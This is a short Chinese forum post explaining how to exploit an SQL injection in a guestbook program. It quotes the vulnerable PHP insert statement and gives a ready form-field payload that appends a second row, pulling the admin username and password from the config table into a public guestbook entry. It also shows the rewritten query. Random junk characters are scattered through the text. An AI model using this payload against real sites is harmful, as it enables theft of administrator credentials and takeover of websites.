留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
6 j" I, H/ f: C8 q" a- ]6 }& c/ K( S8 V: [2 B% g
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。6 k* O2 h' U4 i# r. _4 T
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
4 ]0 Z# s2 [5 T+ m6 x& O' ]& @6 X% l( c: A* a u9 T2 r, @$ q
提交的时候把ifqqh的值改一下。变成% W1 v/ `( B/ O# p5 l$ s# r
7 r/ S9 ~ o5 m6 ]3 K1 O<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />0 D; G4 v8 d l3 O, U$ G
; A' [0 V+ C& @8 e) B这样SQL插入语句就变了.3 ?- ~8 q! C3 b0 _" C( F
0 a' x( ~8 N; v7 a( t5 z* Y
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
2 r; N% n( p9 _; j% ~6 a# U, T% T, j% v+ g% x$ \- P' e
构造了另外一句SQL。并且把帐号密码读出来。
# C4 u9 x, x) ^+ h) R
{/ b% D( p7 b2 l0 \, C( R |
发表于 2013-2-19 08:10:11
收藏
支持
反对